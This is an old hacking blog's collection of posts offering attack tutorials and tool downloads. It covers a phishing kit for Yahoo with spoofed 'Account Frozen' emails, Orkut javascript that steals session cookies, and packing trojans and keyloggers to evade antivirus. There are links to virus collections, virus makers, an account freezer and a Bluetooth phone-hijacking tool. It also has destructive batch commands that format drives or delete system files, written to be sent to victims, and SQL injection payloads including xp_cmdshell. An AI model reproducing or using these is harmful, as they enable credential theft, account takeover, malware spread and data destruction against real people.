starts with <form method=“post” action=“https://login.yahoo.com/config/login?” autocomplete=“off” name=“login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))

5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)

put the following code after placing your form id:

<form name=“New_Form” action=“http://www.webformdesigner.net/wfd_f2.php?id=Your Form ID Here” method=“post” enctype=“application/x-www-form-urlencoded” onsubmit=“return New_Form_CF();”>

Now Save the yahoofake.html.

To hack the victim’s password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.

First of all upload your page using some free webhosting services.

Tip: Register to those webhost which don’t give their own ads and which gives URL of type “your site name.webhost.com”. Now select your site name as mail.yahoo.com/support.You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.

Now send a fake mail from support_yahoo@yahoo.com to the victim’s email address with subject ” Account Frozen” and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.

After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his

account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.

Good Luck !

93 Comments »

Fake Voice   Changer

Posted in Download, Other with tags fake voice changer, free voice changer, full fake voice changer, morph voice on February 27, 2008 by hacktocrack

Fake Voice is a voice changer software which changes your voice to male, female, old, young, hard, shrill, or some one new. If you are female and want to sound like male or if you are male and want to sound like male, this is your tool. You can apply robotic effect to sound like alien or echo effect to sound like you speaking from a well or tunnel. Whether you like you have fun with your friends or you want to improve your voice quality for audio recording, this tool give you full control over your voice.

Download: 4.35 MB

http://rapidshare.com/files/85807298/1920FV.v1.0.8.rar

Mirror1:

http://w15.easy-share.com/15675441.html

Mirror2:

http://www.megaupload.com/?d=H0FMUQH8

Mirror3:

http://www.mediafire.com/?bmdzz5i0mht

Pass: www.dl4all.com

2 Comments »

Hack Orkut   Accounts

Posted in Hardcore Hacking, Mozilla Firefox, Orkut, Website hacks, hacking with tags cookie snarf, hack orkut, hack orkut accounts, hacking, orkut accounts on February 27, 2008 by hacktocrack

If This Doesn’t Work, Please Refer To The “Hot To Hack   Gmail, Yahoo, Hotmail, Orkut, or any other” Post - It Has Been Tested, And It Works

First get firefox and the cookie editor plugin for it…u will need them…

Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..

javascript:nobody=replyForm;nobody.toUserId.value=62915936;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie…

1) Go to your home page

2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action=’scrapbook.aspx?Action.submit’;nobody.submit()

Put ur eight digit number in the place of (53093255)

20 Comments »

How to make ALL Trojan/Virus/Keylogger   UNDETECTABLE

Posted in Hardcore Hacking, Virus, Viruses with tags undetectable virus, make trogan undetectable, make virus, kelogger undetectable on February 26, 2008 by hacktocrack This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favoritekeylogger: Ardamax KeyloggerRemote Administration Tool (Must not have a router): Poisin IvyGoogle is your friend.

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:Code:http://nct.digitalriver.com/fulfill/0161.001

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.3. Once installed, you open it up and see this:

Code:http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:Code:http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!Code:http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go toCode:virustotal.comto scan it with every Antivirus, and they wont find ANYTHING!

„It takes a long time to learn simplicity.“

42 Comments »

Google - Peep Into Other’s Email   Boxes

Posted in Email, Gmail, Google hacks, Website hacks, hacking with tags google hack, hack email on February 25, 2008 by hacktocrack

The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I’m using this string as a tool,I am searching for filetype:eml eml intext:”Content-Type: image/jpeg”.Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can’t belive if you are not checking it yourself.

Keyword : filetype:eml eml intext:”Content-Type: image/jpeg”

Here is ur example:

Click Here

Leave A Comment »

Hack   Websites

Posted in Javascript/html Hacking, Password Hacking, hacking with tags hack website, hacking, hacking websites, how to hack websites on February 25, 2008 by hacktocrack

 NOTE: Works Only On Certian sites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??keep reading…..1. Open the website you want to hack. Provide wrong username-password in its log in form.(e.g : Username : me and Password: ‘ or 1=1 –)An error will occur saying wrong username-password. Now be preparedYour experiment starts from here…2. Right click anywhere on that error page =>> go to view source.3. There you can see the html codings with javascripts.4. There you find somewhat like this….<_form action=”..login….”>5. Before this login information copy the url of the site in which you are.(e.g :”<_form……….action=http://www.targetwebsite.com/login…….>”)6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)7. Then take a close look for “<_input name=”password” type=”password”>”[without quotes] -> replace “<_type=text> ” there instead of “<_type=password>”. See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:chan.html)9. Reopen your target web page by double clicking ‘chan.html’ file that you saved in yourharddisk earlier.10. U see that some changes in current page as compared to original One. Don’t get worried.11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server’s database.*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]The above trick won’t work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!WARNING: We post this trick just for your educational knowledge only. Don’t misuse it other wise you will be in trouble. I take no responsibility of usage of the above trick]

6 Comments »

Secret Backdoor to Many   Websites

Posted in Google hacks with tags forge googlebot, free hack, no credit card on February 25, 2008 by hacktocrack

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first….The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can.We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:by changing your browser’s User Agent.Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

*********************************************

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]@=”Googlebot/2.1″Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent]@=”Googlebot/2.1″“Compatible”=”+http://www.googlebot.com/bot.html

***************************************************

Please Remove The  Spaces Between CurrenVersion Internet Settings

“Voila! You’re done!You may always change it back again….I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site…To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

******************************************

Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent]@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

1 Comment »

Enable Right Clicks on The Sites That Disable   it

Posted in Internet Explorer, Website hacks with tags enable right click on website, right click hack, website hacking on February 25, 2008 by hacktocrack

Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying.This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies.Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.It’s easy to change, assuming your using IE 6:Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website

Leave A Comment »

IceCold   Reloaded

Posted in Uncategorized with tags hack hotmail, hack msn, hack msn hotmail, msn freezer on February 25, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.

NOTE - May Be Detected As A Trogan.HackerTool - It Is Not A Virus

Download Link:

http://rapidshare.com/files/46982035/Ice-Cold-Reloaded_msn-freezer_.zip.html

Leave A Comment »

Super Bluetooth   Hack

Posted in Download, hacking, mobile on February 25, 2008 by hacktocrack

With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can:read his messages- read his contacts- change profile- play his ringtone even if phone is on silent- play his songs(in his phone)- restart the phone- switch off the phone- restore factory settings- change ringing volume- And here comes the bestCall from his phone” it includes all call functions like hold etc.

Notes:1.) When connecting devices use a code 00002.) At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile .

Download: 111kb

http://rapidshare.com/files/69356389/SBH.v1.07.rar

Mirror1:

http://w13.easy-share.com/14502671.html

Mirror2:

http://www.megaupload.com/?d=R0SEV5PUMirror 3: 

http://www.mediafire.com/?3wnbowtbmku

Pass: www.dl4all.com

43 Comments »

6000 Virus ready to   use

Posted in Download, Virus, Viruses with tags crash computer, download virus, Virus on February 25, 2008 by hacktocrack

Here you go 6000 Virus ready to use

Sorry i did not want to write a list to many

after you exetracted the 6000 virus folder there is one more folder called _DANGEROUS_ [DONT RUN ANY] that is holding them ..

THIS IS A WARNING DO NOT RUN ANY OF THE EXE FILES INSIDE FOLDER _DANGEROUS_ [DONT RUN ANY] THERE AS YOU WILL AND MAY DAMAGE YOUR SYSTEM

If you run one by mistake and f**** your PC don’t come to me going off you should have been carefull when in folder _DANGEROUS_ {DONT RUN ANY}

- Download linkz

- > megaupload.com !- > mediafire.com link !

17 Comments »

Hardcore Virus   Makers

Posted in Download, Easy Hacking, Hardcore Hacking, Virus, Viruses with tags easy virus, hack virus, make easy virus, virus maker on February 25, 2008 by hacktocrack

Download:  http://www.megaupload.com/?d=6YPTOAXR

Mirror:   http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html

Code: Select all http://www.megaupload.com/?d=Y356K5W7

Code: Select all http://jeyjey.persiangig.com/Download/JPSVM3.zip

How To Get Virus OffYou may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.

1. Go into processes and end the process csmm.exe2. Go to the toolbar and click start.3. My computer4. C:5. Windows6. System 32

Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again

5 Comments »

Send Fake   Emails

Posted in Email, Hotmail, hacking with tags email hack, fake hacked email, hack email, hack hotmail email, hack yahoo email on February 21, 2008 by hacktocrack

Always Wanted To Get Revenge On Someone?

Send A Fake Email Through Deadfake.com

Try It out!

2 Comments »

How to Hack Gmail or Yahoo or Hotmail or Any Other (Old   Version)

Posted in Gmail, Hotmail, Password Hacking, Yahoo, hacking with tags hack, hack gmail, hack hotmail, hack msn, hack yahoo on February 21, 2008 by hacktocrack There is a new version of this hack which is posted here. This version is also completely working but the new version is better than this one.There are different methods for Hacking Gmail or Yahoo or Orkut or Any Other site. But this method is more popular because it can be used to Hack any of the above sites just you need to make some minute changes. Moreover you don’t require any software or anything you can do it you using all the basic tools which present in a normal computer. Just follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com

2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.

3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML 4. Now open the the file yahoofake.html using noepad, here you ll

find a code which starts with (form action=”xxxxxxxxxxxxxxxxxxxxxxxxxxxxx”)

5. Delete the above code and paste the your id. 6. Now save the file. You can test whether its working or not. Just

open the yahoofake.html file and in the place of user name and password, type some thing and sign in. you will get the passwords in your mail id.. check out..

7. NOW UPLOAD the yahoofake.html page using GOOGLE PAGE Creator or using www.50webs.com

8. After uploading you have to give the link to your friends, once they sign in you ll get the passwords of your friends id.

33 Comments »

How to Format A HDD With   Notepad

Posted in Notepad Tricks with tags format .bat, format hard drive, how to format, Notepad Tricks on February 21, 2008 by hacktocrack If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.Step 1.Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000

Step 2.Save As An EXE Any Name Will Do

Step 3.Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself restcant spoonfeedits working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo offDel C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00

and save it as a .bat file

1 Comment »

Hacks to Beat Rapidshare Download Limits and Waiting   Time

Posted in Rapidshare, Rapidshare Hacking with tags hack rapidshare, Rapidshare Hacking, rapidshare leecher on February 20, 2008 by hacktocrack

Here are some hints to help you more efficently use rapidshare. Skipping waiting time and bypassing download limits are rapidshare hacks that everybody should know.

From www.Jamzezwebsite.webs.com

Here are some methods for doing this:

1. Short-Out the JavaScript:

1. Goto the page you want to download2. Select FREE button3. In the address bar put the following: javascript:alert(c=0)4. Click OK5. Click OK to the pop-up box6. Enter the captcha7. Download Your File

2. Request a new IP address from your ISP server.

Here’s how to do it in windows:1. Click Start2. Click run3. In the run box type cmd.exe and click OK4. When the command prompt opens type the following. ENTER after each new line. ipconfig /flushdnsipconfig /releaseipconfig /renewexit

5. Erase your cookies in whatever browser you are using.6. Try the rapidshare download again.

Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

3. Use a proxy with SwitchProxy and Firefox:

1. Download and install Firefox if you have not already2. Download and install SwitchProxy3. Google for free proxies4. When you hit your download limit, clean your cookies and change your proxy

4. Use an anonymous service:

Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.

5. You can use a bookmarklet to stop your wait times:

1. Open IE2. Right Click On This Link3. Select Add to Favorites4. Select Yes to the warning that the bookmark may be unsafe.5. Name it “RapidShare No Wait”6. Click on the Links folder (if you want to display it in your IE toolbar)7. Click OK8. You may need to close and reopen IE to see it9. Goto rapidshare and click the bookmarklet when you are forced to wait

Leave A Comment »

SQL Injection

Hello fellow hackers . Today , I have brought another exploit for

you known as SQL Injection . So lets kick start the tutorial .

Vocabulary:

* SQL: Server Query Language-used in web applications to interact

with databases.

* SQL Injection: Method of exploiting a web application by supplying

user input designed to manipulate SQL database queries.

* "Injection": You enter the injections into an html form which is sent to

the web application. The application then puts you input directly into a

SQL query. In advertantly, this allows you to manipulate to query...

Prerequisite:

* A background of programming and a general idea of how most

hacking methods are done.

Application:

* Hacking a SQL database-driven server (usually only the ones that use

unparsed user input in database queries). There is still a surprising

number of data-driven web applications on the net that are vulnerable

to this type of exploit. Being as typical as all method, the frequency of

possible targets decreases over time as the method becomes more

known. This is one those exploits that aren't easily prevented by a

simple patch but by a competent programmer.

Use:

First, let's look at a typical SQL query:

SELECT fieldName1, fieldName2 FROM databaseName WHERE

restrictionsToFilterWhichEntriesToReturn

Now, to dissect...

The red areas is where criterion is inputed. The rest of the query

structures the query.

* SELECT fieldName1, fieldName2 - Specifies the of the names of fields

that will be returned from the database.

* FROM databaseName - Specifies the name of the database to search.

* WHERE restrictionsToFilterWhichEntriesToReturn - Specifies which

entries to return.

Here is an example for somebody's login script:

SELECT userAcessFlags FROM userDatabase WHERE

userName="(input here)" AND userPass="(input here)"

The idea is guess what that application's query looks like and input

things designed to return data other than what was intended.

In the example, input like the following could give gain access to the

administrator account:

User: administrator

Pass: " OR ""="

Making the query like this:

SELECT userAcessFlags FROM userDatabase WHERE

userName="administrator" AND userPass="" OR ""=""

As you can see, ""="" (nothing does indeed match nothing)

Note: Injections are rarely as simple as this...

One can be creative and use error messages to your advantadge to

access other databases, fields, and entries. Learn a little SQL to use

things like UNION to merges query results with ones not intended.On

the security side, parse user data and get rid of any extra symbols now

that you know how it's done.

The idea in this example is to break out of the quotation marks.

When stuff is inside quotation marks, the stuff isn't processed as code

or anything but as a phrase and what it is.

The password injection was: " OR ""="

What this does is close the string that was started by the quotation

mark in the part userPass=". Once you break out, THEN stuff is

considered code. So, I put OR ""=" after I break out of the string. You

will notice that it is comparing two quotation marks with one, but the

quotation mark already built in by the application finishes it so we have

this:

userPass="" OR ""=""

Notice how the first and last quotation marks are not colored and are

not built in.

Additional notes:

This was just an extremely simplified version and you will probably

need to learn a little SQL to fully understand.

Here are a few SQL terms that do other things:

UNION: You use this to merge the results of one query with another.

You may put things like SELECT after UNION in order to search other

databases and stuff. Sometimes you may need to use ALL in conjuction

to break out of certain clauses. It does no harm so when in doubt you

could do something like:

" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE

userName="admin

The key when using UNION is to make your new query return the same

amount of columns in the same datatype so that you may get the

results you want.

:-- This works sometimes to terminate the query so that it ignores to

the rest of the stuff that might be fed afterwards if you don't like it. For

example:

SELECT * FROM userDatabase WHERE userName="admin";--" AND

userPass="aH0qcQOVz7e0s"

NOT IN: If you have no idea which record you want you could record

cycle (you request vague info, and you put what you already got in the

NOT IN clause so that you can get the next entry)

Usage:

SELECT userName userPass FROM userDatabase WHERE userName

NOT IN ('Dehstil','Twistedchaos')

EXEC: This command should never work, but if it does...you win; you

could do anything. For instance, you could inject something like this:

';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:

All my examples so far have dealt with read processes. To manipulate

a write process, here is an example for those who know what their

doing:

INSERT INTO userProfile VALUES(''+(SELECT userPass FROM

userDatabase WHERE userName='admin')+'' + 'Chicago' + 'male')

This example would theoretically put the admin's password in your

profile.